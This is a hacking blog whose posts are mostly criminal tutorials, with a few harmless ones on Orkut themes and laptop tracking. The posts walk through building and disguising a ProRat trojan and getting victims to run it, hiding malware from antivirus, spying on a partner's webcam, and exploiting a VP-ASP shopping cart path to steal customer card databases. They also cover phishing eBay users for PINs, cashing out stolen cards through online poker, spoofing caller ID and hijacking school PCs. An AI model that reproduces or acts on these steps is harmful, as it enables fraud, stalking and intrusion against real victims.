Welcome To The Hacker Club 4U

On This Blog Now You can get knowledge about how to to do hacking and also Know how to prevent from hacking and know many tips And tricks of computer and internet

Hacking

Click Here To Know Many Tricks and Tips Of HACKING facebook,twitter and other accounts and passwords

Hacking Safety And Security

Click Here to know how to protect your computer and inetrnet from hacking and know hacking safety and security tips and tricks

Facebook And Twitter

Click On Picture For TWITTER And Click On This Tittle For FACEBOOK .Hacking And Security Tips Of facebook and twitter.Know how to byepass facebook login and twitter login

Gmail And Yahoo

Click On Above Picture For GMAIL Hacking And Security Tips . And.Click On This Title For YAHOO Hacking and security tips


Orkut Theme Creator Will Create Your Own Orkut Themes Instantly

Hii! This is Pc Hackers Guru
As I promised earlier, here is the new Orkut theme creator to create your own orkut themes. Now, you don’t have to look for pre made Orkut themes. Use your favourite pictures to create your own orkut themes. I have added the script here and it’s live now. Start creating your own Orkut themes now.
,,First things first. You need to have Firefox and Greasemonkey for this. Download Firefox browser and Greasemonkey script and install on your computer first. if you have them already, read ahead

How To Create Your Own Orkut Themes Instantly :
1. Get an image first. You can use images from your computer or may link to any online image also.
2. Just make sure that your image is at least 800px wide, else theme will not look good.
3.click here
4. If you are linking to an online image, give the link in the box and hit Submit. If want to use a image from your computer, scroll down to the browse button, choose an image from your computer and hit Submit.
5. Now you will see a page with ‘Install Theme‘ link. Click on that link to install the theme.
6. You have just created and installed an Orkut theme for your profile. You are done.
Useful Tips orkut tips

1. It’s advised to use images will black or blue theme. These colour formats create attractive themes.
2. If you are uploading images from your computer, theme creation process will take some time depending upon your image size.
3. You can always make more themes and install on your computer. Newer theme will replace any older theme on your computer.
4. This Orkut theme will be visible to you ONLY.
5.  Uninstalling Greasemonkey script will disable this feature also. These themes are Greasemonkey script dependent.
6. This works only on Firefox with Greasemoneky. Web browsers like Internet Explorer, Google Chrome, Opera, Apple Safari, Netscape don’t support this trick and hence you will see the default Orkut theme with these browsers.
7. Do not use any copyrighted images, please.
Detailed Tutorial With Screenshots :
How to prepare an Orkut theme with a link to an online image :
1. Create your Orkut theme tutorial
2. Create your Orkut theme tutorial
3. Create your Orkut theme tutorial
4. Create your Orkut theme tutorial
Your theme is ready and you are done.
How to prepare an Orkut theme using a picture from your computer :
1. Create your Orkut theme tutorial
2. Create your Orkut theme tutorial
3. Create your Orkut theme tutorial
4. Create your Orkut theme tutorial
5. Create your Orkut theme tutorial
That’s it. Now make your own orkut themes and enjoy. If you want to uninstall GreaseMonkey themes and use the default official theme,


.

How To Create Or Change Orkut Stylish Themes

Hii! This is Pc Hackers Guru!
By default Orkut have few themes, but many of them are annoying. So, I have created few good looking theme for Orkut addicted users. First 6 themes are being created by me and after that I have compiled a list of some beautiful themes.
You can use these themes for FREE, for using these themes you have to install Greasemonkey add-on in Mozilla Firefox browser. Once you have installed the Greasemonkey add-on just click on the link of any theme below to install it.
Steps you have to follow to install these themes:
How to Install orkut Theme
1. You need to have Firefox Browser to use these themes. (Download Firefox browser)
2. After Installing firefox, you have to install a Plugin Called GreaseMonkey.
3. Now restart your firefox browser to activate Greasemonkey Plugin.
4. After restarting you will be able to see the Following icon in your firefox Status bar (at right side).
5. Now Select any Orkut Theme below you want to install. Click on Install to Activate the theme.
6. Now open your orkut Account to see the effect.




 Download it from here
Download it from here
Download it from here
Download it from here
Download it from here
Download it from here
How to remove or Uninstall the Above orkut theme from your Profile
1. In your firefox browser, go to Tools > Addons.
2. Locate to Extensions > GreaseMonkey > Uninstall.
3. Restart your firefox browser.
     

How to Save a web page as an image

While we wait for the option to save a web page as a PDF, due by Firefox 3 final release, there is another option for sharing and archiving web pages. Save As Image, is a simple yet useful Firefox extension developed by Rowan Lewis that adds an option to Save Page as Image to the File menu. When you select it you have the option to select a particular area of it and tweak it manually with dedicated text boxes provided. At least in theory. The selection overlay that should appear over the actual web page image, appears below it which makes it useless. I’ve contacted Rowan on this and hopefully he will take some time to either fix it or remove the selection features and make it a simpler save-whole-page extension.
With options to choose the image format (JPG/PNG) and image quality I find it extremely useful and, even with the image large size (specially when saving as PNG), still a better alternative to HTML versions that I would like to see available by default in Firefox as another option in the Save Page As… dialog. Being only 10KB (including the user interface) it shouldn’t be a big overhead. Options to save several tabs in a single animated PNG (which will be enormous) and a grayscale would be great to have as well.
Save Page as Image menu options
Save as Image options       Get it at Mozilla Add-ons.

How to hack a website

How To Find If Your Girlfriend/Boyfriend Is Cheating on You using a Mobile Phone GPS Hack

If you can't Find your GF/BF/BFF - Track her/him down with this state of the art website for hacking GPS. This Website will give you the GPS Co-ordinates and will Satellite you a Picture From a Google Earth satellite.

Satellite Tracking:
  • GSM mobile phone tracking system via the GPS-TRACK satellite network
  • Based on repeater triangulation, the system tracks mobile phones using GPS and GSM technology
Approximate margin of error:
  • 10 meters (max.) for mobile phones in Europe and the U.K.
  • 25 meters (max.) for mobile phones in the U.S.A., South America and Canada.
  • 50 meters (max.) for mobile phones elsewhere.
  • This system will not work in countries without GSM technology networks.

Use areas

You can see where a person is; such as your wife, husband or friend in real time anywhere in the world 24/7

www.trackapartner.com

How to Call from Any Number

Well this service was made for private detectives and people like that. It enables you to ring anyone form ANY number with the correct amount of numbers.


To try TeleSpoof, fill out the form for a FREE TeleSpoof call. Call anyone you want! Display any number on their caller ID!

TeleSpoof offers the ability to change what someone will see on their caller ID display when they receive a phone call. Simply dial the toll free number and then enter your PIN. You will be prompted to enter the destination number followed by the phone number you want to appear on caller ID. It's that easy!

Try TeleSpoof

How To Access Remote Computers from Your Mobile Phone

Here i am giving you a cracked version of TeamViewer Pro for iPhone and iPod Touch that allow you to access remote computers from everywhere. It allows you to give spontaneous support as well as having permanent access to unattended computers. You can:
  • Support your clients and colleagues spontaneously.
  • Access your office desktop with all of its documents and installed applications.
  • Remotely administer unattended computers (e.g. servers).


Features:
  • Remotely access unattended computers
  • Conveniently control remote computers using the iPhone multi-touch gestures: left click, right click, drag & drop, scroll wheel, zoom, change monitor
  • Complete keyboard control incl. special keys such as Ctrl, Alt, Windows®
  • Remotely reboot the computer
  • Automatically adjust the screen resolution of the remote computer
  • Overview of computers that are online via the integrated Partner list
  • Effortlessly access computers behind firewalls and proxy servers
  • Meets highest security standards: 256 Bit AES Session Encoding, 1024 Bit RSA Key Exchange

Download TeamViewer Pro for iPhone, and iPod Touch

How to Hack E-Mail Account Password - Email Hacking Software

In this article i'll show you how to hack email account password using keyloggers and trojans. Here I am demonstrating using PRORAT trojan. You can use any trojan or keylogger as per your ease. The basic functionality of all backdoors are same. Pls make note that all these hacking tools and softwares are detected by antivirus. You have to uninstall or close you running antivirus first. Now we can start.

How to Hack Email Account Passwords Using ProRat?


1. First of all Download ProRat. Once it is downloaded right click on the folder and choose to extract it. A password prompt will come up. The password will be "pro".

2. Open up the program. You should see the following:


3. Next we will create the ProRat Trojan server. Click on the "Create" button in the bottom. Choose "Create ProRat Server".


4. Next put in your IP address so the server could connect to you. If you don’t know your IP address click on the little arrow to have it filled in for you automatically. Next put in your e-mail so that when and if a victim gets infected it will send you a message. We will not be using the rest of the options.


5. Now Open General settings. This tab is the most important tab. In the check boxes, we will choose the server port the program will connect through, the password you will be asked to enter when the victim is infected and you wish to connect with them, and the victim name. As you can see ProRat has the ability to disable the windows firewall and hide itself from being displayed in the task manager.

Here is a quick overview of what they mean and which should be checked:


6. Click on the Bind with File button to continue. Here you will have the option to bind the trojan server file with another file. Remember a trojan can only be executed if a human runs it. So by binding it with a legitimate file like a text document or a game, the chances of someone clicking it go up. Check the bind option and select a file to bind it to. A good suggestion is a picture or an ordinary text document because that is a small file and its easier to send to the people you need.


7. Click on the Server Extensions button to continue. Here you choose what kind of server file to generate. I prefer using .exe files, because it is cryptable and has icon support, but exe’s looks suspicious so it would be smart to change it.


8. Click on Server Icon to continue. Here you will choose an icon for your server file to have. The icons help mask what the file actually is. For my example I will choose the regular text document icon since my file is a text document.

9. After this, press Create server, your server will be in the same folder as ProRat. A new file with name "binded_server" will be created. Rename this file to something describing the picture. A hacker could also put it up as a torrent pretending it is something else, like the latest game that just came out so he could get people to download it.

Very important: Do not open the "binded_server" file on your system.

10. You can send this trojan server via email, pendrive or if you have physical access to the system, go and run the file. You can not send this file via email as "server.exe", because it will be detected as trojan or virus. Password protect this file with ZIP and then email it. Once your victim download this ZIP file, ask him to unlock it using ZIP password. When the victim will double click on the file, he will be in your control.

11. Now, I will show you what happens when a victim installs the server onto his computer and what the hacker could do next.

Once the victim runs the server on his computer, the trojan will be installed onto his computer in the background. The hacker would then get a message telling him that the victim was infected. He would then connect to his computer by typing in his IP address, port and clicking Connect. He will be asked for the password that he made when he created the server. Once he types it in, he will be connected to the victims computer and have full control over it.


12. Now the hacker has a lot of options to choose from as you can see on the right. He has access to all victim's computer files, he can shut down his pc, get all the saved passwords off his computer, send a message to his computer, format his whole hard drive, take a screen shot of his computer, and so much more. Below I’ll show you a few examples.


13. The image below shows the message that the victim would get on his screen if the hacker chose to message him.


14. Below is an image of the victims task bar after the hacker clicks on Hide Start Button.


15. Below is an image of what the hacker would see if he chose to take a screen shot of the victims screen.


As you saw in the above example, a hacker can do a lot of silly things or a lot of damage to the victim. ProRat is a very well known trojan so if the victim has an anti-virus program installed he most likely won’t get infected. Many skilled hackers can program their own viruses and Trojans that can easily bypass anti-virus programs.

How to Hack and Spy on a Webcam

I get a lot of emails where my readers are asking for help to find out if his/her partner is cheating on them, chatting to someone she/he shouldn't be, etc. So here i decided to answer this question, and to get it clear once for all.
Today there are softwares called RATs (Remote Administrator Tools) that are mostly used for malicious purposes, such as controlling PC’s, stealing victims data, deleting or editing some files. You can only infect someone by sending him file called Server and they need to click it. With a RAT, you can make the party download files, view their desktop/webcam, and more.

Except the advantages of using a RAT, there are also few disadvantages that you should know about:

1. The RATs are detected by the most anti-virus software.
2. You can get infected by using a RAT.
3. You can get traced when you rat somebody.

In this article i am going to share A step by step guide that allows you to remotely access anybody's webcam, microphone, files and desktop from anywhere in the world, without to worry about the things i mention above.

You can install this on any PC and monitor who ever uses that PC, or even someone passing by. There are no system requirements and this works 99.9% of the time.

This also includes the ability to:

  • Access almost any computer anywhere without knowing the computer password or IP Address.
  • Record and watch any webcam at the same time.
  • Record desktop action and watch at the same time.
  • Dig deep into files, download then and upload new ones.
  • Watch a webcam from any PC in the world.
  • Monitor activities whenever that PC or laptop is online.
  • Save all recordings in a number of file types.
This software costs $14.99, but I think the price totally worth for a software like this one.

I have tested this from every single angle possible and have had the BEST success rate with it.

The Best Operating System for Hackers

There are a couple of things that are essential to any hacker’s walk of life. To name a few, there’s the ubiquitous flash drive for data transfer. You have the crossover cable for even faster data transfer. There’s the Wi-Fi antenna for high gain and strong amplification. Possibly, you might find a video capture card in the computer. Of course, there’s the ubiquitous laptop and desktop computer. But what software is on these computers? Undoubtedly, you will find at least two operating systems, most often Windows and Linux. But with Linux, there are several different distributions. Is there a specific one? With hackers and crackers, there is only one Linux distro out there. It is called Backtrack.


BackTrack is a Linux-based penetration testing arsenal that aids security professionals in the ability to perform assessments in a purely native environment dedicated to hacking.

Regardless if you’re making BackTrack your primary operating system, booting from a Live DVD, or using your favourite thumb drive, BackTrack has been customized down to every package, kernel configuration, script and patch solely for the purpose of the penetration tester.

BackTrack is intended for all audiences from the most savvy security professionals to early newcomers to the information security field. BackTrack promotes a quick and easy way to find and update the largest database of security tool collection to-date.

Back Track is quite possibly the most comprehensive Linux distribution of security tools. Both hackers and crackers can appreciate the features of this distribution. For black-hatters, it is an easy access to software that facilitates exploitations of secure system. For white-hatters, it is a penetration tester that finds holes in a security scheme. See, everybody wins!

Major Features

BackTrack features the latest in security penetration software. The current Linux kernel is patched so that special driver installation is unnecessary for attacks. For example, an Atheros-based wireless networking adapter will no enter monitor mode or inject packets without the MadWiFi driver patch. With BackTrack, you don’t need to worry about that. It’s just plug-and-play ready-to-go!

What’s great is that this Linux distribution comes Live-on-CD. So, no installation is needed. However, what you experience BackTrack, you will realize that it is a must to download this operating system and install it on your Laptop. At the very least, download the VMWare Virtual Appliance for Backtrack. Make sure you also install the VMWare Tools for Linux as well. Many features will still work in VMWare mode.
  • Based on: Debian, Ubuntu
  • Origin: Switzerland
  • Architecture: i386
  • Desktop: Fluxbox, KDE
  • Category: Forensics, Rescue, Live Medium
  • Cost: Free

Tools:

BackTrack provides users with easy access to a comprehensive and large collection of security-related tools ranging from port scanners to password crackers. Support for Live CD and Live USB functionality allows users to boot BackTrack directly from portable media without requiring installation, though permanent installation to hard disk is also an option.

BackTrack includes many well known security tools including:
  • Metasploit integration
  • RFMON Injection capable wireless drivers
  • Kismet
  • Nmap
  • Ettercap
  • Wireshark (formerly known as Ethereal)
  • BeEF (Browser Exploitation Framework)

A large collection of exploits as well as more common place software such as browsers. BackTrack arranges tools into 11 categories:
  • Information Gathering
  • Network Mapping
  • Vulnerability Identification
  • Web Application Analysis
  • Radio Network Analysis (802.11, Bluetooth, Rfid)
  • Penetration (Exploit & Social Engineering Toolkit)
  • Privilege Escalation
  • Maintaining Access
  • Digital Forensics
  • Reverse Engineering
  • Voice Over IP

Download and Documents:

Home Page
User Forums
Documentation
Download Mirrors

How to Make a Trojan Undetectable by Antivirus Software

Here i am going to show you how to make your trojan, keylogger, or RAT almost FUD (Fully Undetectable) by any anti-virus software.

We gonna need a Privacy Protection Software. This kind of software is used by program creators to protect their creation from cracking and reverse engineering. We gonna do the same to a trojan and you are going to see the result.

1. First of all you need to download the program: PC Guard for Win32

2. Open the program, and in the "Application filename" browse your server's location.


2. Click on the "General" tab, and check the options like on the image below.


3. Now do the same with the "Security & Encryption" tab. Look at the image below to see what options to check.


4. At the end choose "Protection Methods", and select the following options:


We are done!


The Scan Results:


Poison Ivy server:

Bifrost server:

Get Web Scanner for Hackers Worth 3195$ for Free

Acunetix - The webmasters best friend, or worst enemy?

As many as 70% of web sites have vulnerabilities that could lead to the theft of sensitive corporate data such as credit card information and customer lists.

Hackers are concentrating their efforts on web-based applications - shopping carts, forms, login pages, dynamic content, etc. Accessible 24/7 from anywhere in the world, insecure web applications provide easy access to backend corporate databases.

Firewalls, SSL and locked-down servers are futile against web application hacking!

Web application attacks, launched on port 80/443, go straight through the firewall, past operating system and network level security, and right in to the heart of your application and corporate data. Tailor-made web applications are often insufficiently tested, have undiscovered vulnerabilities and are therefore easy prey for hackers.

Acunetix - a world-wide leader in web application security

Acunetix has pioneered the web application security scanning technology: Its engineers have focused on web security as early as 1997 and developed an engineering lead in web site analysis and vulnerability detection.

Acunetix Web Vulnerability Scanner includes many innovative features:
  • AcuSensor Technology
  • An automatic client script analyzer allowing for security testing of Ajax and Web 2.0 applications
  • Industries' most advanced and in-depth SQL injection and Cross site scripting testing
  • Advanced penetration testing tools, such as the HTTP Editor and the HTTP Fuzzer
  • Visual macro recorder makes testing web forms and password protected areas easy
  • Extensive reporting facilities including VISA PCI compliance reports
  • Multi-threaded and lightning fast scanner crawls hundreds of thousands of pages with ease
  • Intelligent crawler detects web server type and application language
  • Acunetix crawls and analyzes websites including flash content, SOAP and AJAX
  • Port scans a web server and runs security checks against network services running on the server

Acunetix can be used to fully determine if a website is vulnerable in any way, and it rates the security risk level. It can scan for all the attacks mentioned above to see what its vulnerable, or find allot of useful info about the site as given.



This tool can be used by both white hats and black hats. It worths 3195$ for 1 year!!! I am giving it for free and unlimited time. That's a hell a lot of money.


Install Notes:
  1. Install acunetix 6.5.
  2. Replace original files with crack folder content.
  3. Start wvs.exe and your done.
Download Acunetix (Clean copy, tested by me)

Hacking and Security Books

Most of us are very curious to learn Hacking and want to become a Hacker, but don’t know where to start. If you are in the same situation, then this is the right place for you.

Everyone can become a Hacker provided they learn it from the basics. So if you wanna become a hacker, then all you need is a good source that will teach you hacking from the basics. There exists tons of books on the market that teach you Hacking but unfortunately, it requires a set of pre-established skills and knowledge to understand the concepts explained in the book. Also these books are not meant the for beginners who doesn’t know anything about hacking. As a solution to this problem we have found two excellent books for the beginners to start their journey as a Hacker.

The good thing about these two books is, any one can understand the concepts presented in the book without the need for any prior knowledge.

"Computer Hacking" recommends the following books for the beginners


1. The Hacker's Underground Handbook


This book is designed for the absolute beginners who are willing to learn Hacking from the basics. This book does not demand any prior knowledge about Hacking. So if you are a newbie to the concept of hacking and want to master it from the basics, then this book is for you.

The information given in this underground handbook will put you into a hacker’s mindset and teach you all of the hacker’s secret.

The following skills are uncovered in this book

1. You will learn all the hackers underground tricks and learn to apply them in the real world situations.

2. You will be put into a hackers mindset and learn to think like one.

3. By Learning how a hacker thinks and acts, you will be able to protect yourself from future hack attacks.

4. You will acquire knowledge nonexistant to 99.9% of the people in the world!

5. This Underground handbook may get you interested in pursuing a career as an Ethical Hacker.

For more information on this book and download details visit the following link

The Hackers Underground Handbook


2. A Beginners Guide to Ethical Hacking
You might have heard about some paid password hacking softwares which claim to hack a password on entering the email account. But in reality all those softwares are fake. If you believe what they say then you are just wasting your time and money. These all softwares are fake. If there exists such a software, will there be any security on web. And all expert engineers at Google, Yahoo and other services are not mad. They are all engaged in ensuring security of their customers ie email account owners. So, no such software exists.
So stop wasting your time and money on these foolish softwares and services and learn real Ethical Hacking methods which hackers use to access email accounts.

How will the information in the book affect me?

1. You will learn All Ethical hacking techniques and also you will learn to apply them in real world situation

2. You will start to think like hackers

3. Secure your computer from trojans, worms, Adwares etc

4. Amaze your friends with your newly learned tricks

5. You will be able to protect your self from future hack attacks

And Much more...

For more information on this book and download details visit the following link

Search Engine for Hackers

A new search engine has been introduced called "SHODAN" that lets you find specific computers (routers, servers, etc.) using a variety of filters. Some have also described it as a public port scan directory or a search engine of banners.


Web search engines, such as Google and Bing, are great for finding websites. But what if you're interested in finding computers running a certain piece of software (such as Apache)? Or if you want to know which version of Microsoft IIS is the most popular? Or you want to see how many anonymous FTP servers there are? Maybe a new vulnerability came out and you want to see how many hosts it could infect? Traditional web search engines don't let you answer those questions.

Following things could be searched for:
  • country: 2-letter country code
  • hostname: full or partial host name
  • net: IP range using CIDR notation (ex: 18.7.7.0/24 )
  • port: 21, 22, 23 or 80

As we [some of us] can understand, it is very easy to find vulnerable host just by looking at all the banner responses shown by SHODAN. It could turn out to be a huge threat as many skiddies could be scanning hosts anonymously round the clock for particular exploit or something that they understand well.

Click here to go to SHODAN

How to Hack a Credit Card

Hi there. This is my first serious "black hat hacking" post of credit cards hacking. Here will be explained all methods used to hack credit cards and bank accounts with lots of $$ it. Now I'm sure most of you think that this is fake or scam, but i want to just tell u this is real and the only working method (in my opinion) to hack a credit card and make your wish come true (lol, hope it doesn't sound like a commercial).
This tutorial is divided in two parts.
  1. Introduction into Credit Cards
  2. Credit card Hacking

Note: Hacking credit cards is an illegal act, this is only informational post and I am not responsible for any actions done by you after reading this tutorial. This post is for educational purposes only.

Lets start with some easy terms.

What is credit card ?

Credit cards are of two types:
  • Debit Card
  • Credit Card
1. Debit means u have a sum of amount in it and u can use them.
2. Credit means u have a credit line limit like of $10000 and u can use them and by the end of month pay it to bank.

To use a credit card on internet u just not need cc number and expiry but u need many info like :
  • First name
  • Last name
  • Address
  • City
  • State
  • Zip
  • Country
  • Phone
  • CC number
  • Expiry
  • CVV2 ( this is 3digit security code on backside after signature panel )
If you get that info you can use that to buy any thing on internet, like software license, porn site membership, proxy membership, or any thing (online services usually, like webhosting, domains).

If u want to make money $ through hacking then you need to be very lucky... you need to have a exact bank and bin to cash that credit card through ATM machines.

Let me explain how ?

First study some simple terms.

BINS = first 6 digit of every credit card is called " BIN " (for example cc number is : 4121638430101157 then its bin is " 412163 "), i hope this is easy to understand.

Now the question is how to make money through credit cards. Its strange..., well you cant do that, but there is specific persons in world who can do that. They call them selves " cashiers ". You can take some time to find a reliable cashiers.

Now the question is every bank credit cards are cashable and every bin is cashable? Like citibank, bank of america , mbna .. are all banks are cashables ? Well answer is " NO ". If u know some thing, a little thing about banking system, have u ever heard what is ATM machines? Where u withdraw ur cash by putting ur card in.
Every bank don't have ATM, every bank don't support ATM machines cashout. Only few banks support with their few bins (as u know bin is first 6 digit of any credit / debit card number), for suppose bank of america. That bank not have only 1 bin, that bank is assigned like, 412345 412370 are ur bins u can make credit cards on them. So bank divide the country citi location wise, like from 412345 - 412360 is for americans, after that for outsiders and like this. I hope u understand. So all bins of the same bank are even not cashable, like for suppose they support ATM in New York and not in California, so like the bins of California of same bank will be uncashable. So always make sure that the bins and banks are 100% cashable in market by many cashiers.

Be sure cashiers are legit, because many cashiers r there which take your credit card and rip u off and don't send your 50% share back.
You can also find some cashiers on mIRC *( /server irc.unixirc.net:6667 ) channel : #cashout, #ccpower

Well, check the website where u have list of bins and banks mostly 101% cashable. If u get the credit card of the same bank with same bin, then u can cashout otherwise not . Remember for using credit card on internet u don't need PIN ( 4 words password which u enter in ATM Machine ), but for cashout u need. You can get pins only by 2nd method of hacking which i still not post but i will. First method of sql injection and shopadmin hacking don't provide with pins, it only give cc numb cvv2 and other info which usually need for shopping not for cashing.

Credit Card Hacking

CC (Credit Cards) can be hacked by two ways:
  • Credit Card Scams ( usually used for earning money , some times for shopping )
  • Credit Card Shopadmin Hacking ( just for fun, knowledge, shopping on internet )
1. Shopadmin Hacking

This method is used for testing the knowledge or for getting the credit card for shopping on internet, or for fun, or any way but not for cashing ( because this method don't give PIN - 4 digit passcode ) only gives cc numb , cvv2 and other basic info.

Shopadmins are of different companies, like: VP-ASP , X CART, etc. This tutorial is for hacking VP-ASP SHOP.

I hope u seen whenever u try to buy some thing on internet with cc, they show u a well programmed form, very secure. They are carts, like vp-asp xcarts. Specific sites are not hacked, but carts are hacked.

Below I'm posting tutorial to hack VP ASP cart. Now every site which use that cart can be hacked, and through their *mdb file u can get their clients 'credit card details', and also login name and password of their admin area, and all other info of clients and comapny secrets.

Lets start:

Type: VP-ASP Shopping Cart
Version: 5.00

How to find VP-ASP 5.00 sites?

Finding VP-ASP 5.00 sites is so simple...

1. Go to google.com and type: VP-ASP Shopping Cart 5.00
2. You will find many websites with VP-ASP 5.00 cart software installed

Now let's go to the exploit..

The page will be like this: ****://***.victim.com/shop/shopdisplaycategories.asp
The exploit is: diag_dbtest.asp
Now you need to do this: ****://***.victim.com/shop/diag_dbtest.asp

A page will appear contain those:
  • xDatabase
  • shopping140
  • xDblocation
  • resx
  • xdatabasetypexEmailxEmail NamexEmailSubjectxEmailSy stemxEmailTypexOrdernumbe r
Example:

The most important thing here is xDatabase
xDatabase: shopping140

Ok, now the URL will be like this: ****://***.victim.com/shop/shopping140.mdb

If you didn't download the Database, try this while there is dblocation:
xDblocation
resx
the url will be: ****://***.victim.com/shop/resx/shopping140.mdb

If u see the error message you have to try this :
****://***.victim.com/shop/shopping500.mdb

Download the mdb file and you should be able to open it with any mdb file viewer, you should be able to find one at download.com, or use MS Office Access.
Inside you should be able to find credit card information, and you should even be able to find the admin username and password for the website.

The admin login page is usually located here: ****://***.victim.com/shop/shopadmin.asp

If you cannot find the admin username and password in the mdb file or you can but it is incorrect, or you cannot find the mdb file at all, then try to find the admin login page and enter the default passwords which are:
Username: admin
password: admin
OR
Username: vpasp
password: vpasp


2. Hacking Through Scams

This method is usually used to hack for earning money. What happens in this method is you create a clone page.

Target: its basically eBay.com or paypal.com for general credit cards, or if u want to target any specific cashable bank like regionbank.com then u have to create a clone page for that bank.

What is eBay.com?

Its a shopping site world wide which is used by many of billion people which use their credit cards on ebay. What you do make a similar page same as eBay and upload it on some hosting which don't have any law restrictions, try to find hosting in Europe they will make your scam up for long time, and email the users of eBay.

How to get the emails of their users?

Go to google.com and type "Email Harvestor" or any Email Spider and search for eBay Buyers and eBay Sellers and u will get long list. That list is not accurate but out of 1000 atleast 1 email would be valid. Atleast you will get some time.

Well u create a clone page of ebay, and mail the list u create from spider with message, like "Your account has been hacked" or any reason that looks professional, and ask them to visit the link below and enter your info billing, and the scam page have programming when they enter their info it comes directly to your email.
In the form page u have PIN required so u also get the PIN number through which u can cash through ATM ..

Now if u run ebay scam or paypal scam, its up to your luck who's your victim. A client of bank of america or of citibank or of region, its about luck, maybe u get cashable, may be u don't its just luck, nothing else.

Search on google to download a scam site and study it !

After you create your scam site, just find some email harvestor or spider from internet (download good one at Bulk Email Software Superstore - Email Marketing Internet Advertising) and create a good email list.

And you need to find a mailer (mass sending mailer) which send mass - emails to all emails with the message of updating their account on ur scam page ). In from to, use email eBay@reply3.ebay.com and in subject use : eBay - Update Your eBay Account and in Name use eBay

Some Instructions:

1. Make sure your hosting remains up or the link in the email u will send, and when your victim emails visit it, it will show page cannot be displayed, and your plan will be failed.
2. Hardest point is to find hosting which remains up in scam. even i don't find it easily, its very very hard part.
3. Maybe u have contacts with someone who own hosting company and co locations or dedicated he can hide your scam in some of dedicated without restrictions.
4. Finding a good email list (good means = actually users)
5. Your mass mailing software land the emails in inbox of users.


That's all folks. Hope you will find this tutorial useful. And remember, hacking credit cards is an illegal act, this is only informational post and I am not responsible for any actions done by you after reading this tutorial.

How To Cash Out From Stolen Credit Cards

Here i will show you how to make money with Credit Cards from EVERYWHERE!!! Now before we continue, make sure you check your equipment:
  • Online game
  • Proxy
  • Credit card
1. Online game- Your Tool to Cash out

At first you have to register on an online game site, like site where you can play poker or backgammon. It is only important that you can play with real money.

For example online games like: http://www.pokerstars.com

You need 2 accounts. One of them must be your own, and the second have to be like the Credit card user. You can make account in most online games for free.

2. Proxy

After you are done with your accounts, join your Proxy. It is nice if you use the same Proxy like your credit card comes from. (e.g. German credit card, and German proxy).

3. Credit Card

Now when you connect to the Proxy, join your faked account to play online. Then purchase Real money from the hacked or stolen Credit card. Don't use your own Credit Card, it wouldn't have any effect.

How to Cashout

Join the game with your Accounts (your faked and your real) to play. You have to click on the "Play with Real Money" Button. To play you need more then 2 players on the Table. You can make more accounts to sit with all your accounts on the table, but i use to play with some friends which know what I'm doing. Then Play.

IMPORTANT: Your real account needs some real money too, 5-10$ is enough.

Then your friends have to give up the round, so that only you and your faked account is in, like 1 on 1. Now press the "All-In" Button with your Faked Account, and with your Real Account too.

The effect: Your faked account will set all the money from the hacked/stolen Credit card, and your real account will set 5-10$. Then your faked account have to lose, like give up. Now you will take all the money and logout from the Game. Press "Cashout" to cash out your Money to your real Credit card.

How To Hack Your School Network

Because of the frequency this question has been asked on this blog, i have decided to create a document for this question. This tutorial is for those newbies out there, wanting to "hack" their school. I'm gonna start by saying, if your going to hack the school, theres a high probability your get caught, and don't do anything dumb like deleting the network. Its lame, and you will get flamed for doing it. This hack will allow you to take control of the PC's at school. Lets start:

How to take control of the PC's at school:

Here are the steps;
  1. Preparing The Virus
  2. Setting Up The Virus
  3. Controlling The PC

Obviously, if you gonna take control over your school PC you need a virus. You have 2 methods:
  1. The virus I made which is harmless and you won't even notice it was executed.
  2. Dropping a Trojan on the school PC.
Method 1

What you need:
  • Pen Drive (You can buy one, or you just use yours)
  • Brain (You can't buy this)

Now, open notepad and copy/paste this code: the code

Save the file as something.bat (you can change something to whatever you want). In "Save as type:" choose "All Files".


I strongly recommend you not to change the rdport and tnport configuration. The rdport will open the remote desktop default port, and the tnport will open the telnet's client default port.

You can change the username, password and the rport (randomn port you choose to be opened)

At ipconfig /all >> C:\attach.txt you must change C:/ by your pen drive letter.

Save it and remove your pen drive.

Take your pen drive to school and run the bat file. Don't forget the pc you runned it in cause you might need it.

When you get home go to your pc and try to telnet them or remote desktop the PC.

Method 2:

In this method we will use a Trojan to control the school PC.

Here is a tutorial about how to create a Trojan: ProRat Trojan

Now just create a server (there is an explanation in the tutorial above), bind it and put it into your pen drive. Make sure you leave your PC turned on.

Then go to your school and drop the trojan.

Other way to do this is to give your trojan to a friend and tell him to stay in school. When you arrive home, send him a SMS and tell him to drop the trojan. This way you could even see if it worked.

After this you can probably do whatever you want with the PC.

How to Track Your Stolen Laptop

My friend recently bought a Toshiba laptop, but it was stolen within a couple days. The good thing is that i had installed a tracing software on his laptop the very same day he bought it, and he had no troubles finding it. This can happen to anyone which is using laptop, so having a tracing software installed on your laptop is not a bad idea.

Here i am showing you a free laptop tracing software called Prey.

Prey lets you keep track of your phone or laptop at all times, and will help you find it if it ever gets lost or stolen. It's lightweight, open source software, and free for anyone to use. And it just works.


How it Works?

Basically you install a tiny agent in your PC or phone, which silently waits for a remote signal to wake up and work its magic.

This signal is sent either from the Internet or through an SMS message, and allows you to gather information regarding the device's location, hardware and network status, and optionally trigger specific actions on it.

Notice: This file is Trojan as detected by some antivirus, but the thing is every such files are called trojan, as the process is to Track your system and view your systems reports. But be secure, this file is not harmful for your system or for your personal information. This software is made By PRey Project Company, and they take responsibility of it.

How to Download and Install Prey?

1. First of all download Prey project file from here.

2. After Downloading, Install the File and than

- They will ask for either standalone and +control panel.
- Go for +control panel, and than Click For New User.
- Give Your Name, Your Email and select Password to login the site.

E.g, Name :- John Smith
Email:-johnsmith@gmail.com
Password:-123456 (any Password that you choose) for Entering the site, and than press ok.

- You will get Email from prey project, just activate your account there, and click your device and do the following settings:

Click on the images to see the full size

If you "on" any of the above settings than be sure to remember password of "lock pass". It will show as the tym you make it on. Just below the lock it will be written pass, and when alert is on the message will display whenever you login, "this laptop is stolen ...."-lol

So these were all steps now you can install and get secure. Now if its get stolen than you can track back

Remember:
This still has demerit E.g, If theif formats your system completly than its no way possible to get back than to ask for police, and they don't track laptop normally, until the stolen system is related with some serious case.

Recommend us on Google!

Share

Twitter Delicious Facebook Digg Stumbleupon Favorites More